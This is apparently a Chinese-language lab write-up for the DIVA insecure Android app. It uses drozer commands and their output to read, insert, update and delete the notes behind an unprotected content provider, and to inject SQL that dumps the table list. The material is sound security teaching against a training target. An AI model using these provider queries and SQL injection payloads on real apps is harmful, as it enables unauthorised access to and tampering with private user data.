Test DIVA - content provider exported - DB Based
這一題是第11. Access Control Issues - Part 3,用意是要我們不需要PIN code就可以access儲存起來的notes
- 起手式
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23dz> run app.provider.info -a jakhar.aseem.diva Attempting to run shell module Package: jakhar.aseem.diva Authority: jakhar.aseem.diva.provider.notesprovider Read Permission: null Write Permission: null Content Provider: jakhar.aseem.diva.NotesProvider Multiprocess Allowed: False Grant Uri Permissions: False Uri Permission Patterns: Path Permissions: dz> run scanner.provider.finduris -a jakhar.aseem.diva Attempting to run shell module Scanning jakhar.aseem.diva... No respone from content URI: content://jakhar.aseem.diva.provider.notesprovider/ Got a response from content Uri: content://jakhar.aseem.diva.provider.notesprovider/notes No respone from content URI: content://jakhar.aseem.diva.provider.notesprovider Got a response from content Uri: content://jakhar.aseem.diva.provider.notesprovider/notes/ For sure accessible content URIs: content://jakhar.aseem.diva.provider.notesprovider/notes content://jakhar.aseem.diva.provider.notesprovider/notes/從以上測試結果可以知道
jakhar.aseem.diva.NotesProvider的狀況,以及對應的URI為何 - 逆向
從
NotesProvider這個class可以知道他就是一個負責管理Notes資料庫的一個class,並且同時負責query/update/insert/delete這幾個function,那我們是不是也可以用和Sieve類似的方法對這個database發出request - query/insert/update/delete/sqli
- query
我們達到了一開始題目的要求,只需要直接query就好了
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --vertical Attempting to run shell module _id 5 title Exercise note Alternate days running _id 4 title Expense note Spent too much on home theater _id 6 title Weekend note b333333333333r _id 3 title holiday note Either Goa or Amsterdam _id 2 title home note Buy toys for baby, Order dinner _id 1 title office note 10 Meetings. 5 Calls. Lunch with CEO - insert
1
2
3
4
5
6
7
8
9
10
11
12
13
14dz> run app.provider.insert content://jakhar.aseem.diva.provider.notesprovider/notes --integer _id 7 --string title pwn1 --string note pwnpwn1 Attempting to run shell module Done. dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes Attempting to run shell module | _id | title | note | | 5 | Exercise | Alternate days running | | 4 | Expense | Spent too much on home theater | | 6 | Weekend | b333333333333r | | 3 | holiday | Either Goa or Amsterdam | | 2 | home | Buy toys for baby, Order dinner | | 1 | office | 10 Meetings. 5 Calls. Lunch with CEO | | 7 | pwn1 | pwnpwn1 | - update
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15dz> run app.provider.update content://jakhar.aseem.diva.provider.notesprovider/notes --selection "_id=?" --selectio n-args 7 --string title pwn2 --string note pwnpwn2 Attempting to run shell module Done. dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes Attempting to run shell module | _id | title | note | | 5 | Exercise | Alternate days running | | 4 | Expense | Spent too much on home theater | | 6 | Weekend | b333333333333r | | 3 | holiday | Either Goa or Amsterdam | | 2 | home | Buy toys for baby, Order dinner | | 1 | office | 10 Meetings. 5 Calls. Lunch with CEO | | 7 | pwn2 | pwnpwn2 | - delete
1
2
3
4
5
6
7
8
9
10
11
12
13
14dz> run app.provider.delete content://jakhar.aseem.diva.provider.notesprovider/notes --selection "_id=?" --selection -args 7 Attempting to run shell module Done. dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes Attempting to run shell module | _id | title | note | | 5 | Exercise | Alternate days running | | 4 | Expense | Spent too much on home theater | | 6 | Weekend | b333333333333r | | 3 | holiday | Either Goa or Amsterdam | | 2 | home | Buy toys for baby, Order dinner | | 1 | office | 10 Meetings. 5 Calls. Lunch with CEO | - sqli
測試的payload如下,的確出現sqli的漏洞,而且可以看到完整的table
1
2
3
4
5
6
7
8
9
10dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --selection "'" Attempting to run shell module Exception occured: unrecognized token: "') ORDER BY title" (code 1 SQLITE_ERROR): , while compiling: SELECT * FROM notes WHERE (') ORDER BY title dz> run app.provider.query content://jakhar.aseem.diva.provider.notesprovider/notes --projection "* FROM SQLITE_MASTER WHERE type='table';--" Attempting to run shell module | type | name | tbl_name | rootpage | sql | | table | android_metadata | android_metadata | 3 | CREATE TABLE android_metadata (locale TEXT) | | table | notes | notes | 4 | CREATE TABLE notes (_id INTEGER PRIMARY KEY AUTOINCREMENT, title TEXT NOT NULL, note TEXT NOT NULL) | | table | sqlite_sequence | sqlite_sequence | 5 | CREATE TABLE sqlite_sequence(name,seq) |也可以透過drozer自動找可能的點
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27dz> run scanner.provider.injection -a jakhar.aseem.diva Attempting to run shell module Scanning jakhar.aseem.diva... Not Vulnerable: content://jakhar.aseem.diva.provider.notesprovider/ content://jakhar.aseem.diva.provider.notesprovider Injection in Projection: content://jakhar.aseem.diva.provider.notesprovider/notes/ content://jakhar.aseem.diva.provider.notesprovider/notes Injection in Selection: content://jakhar.aseem.diva.provider.notesprovider/notes/ content://jakhar.aseem.diva.provider.notesprovider/notes dz> run scanner.provider.sqltables -a jakhar.aseem.diva Attempting to run shell module Scanning jakhar.aseem.diva... Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes/: android_metadata notes sqlite_sequence Accessible tables for uri content://jakhar.aseem.diva.provider.notesprovider/notes: android_metadata notes sqlite_sequence
- query
我們達到了一開始題目的要求,只需要直接query就好了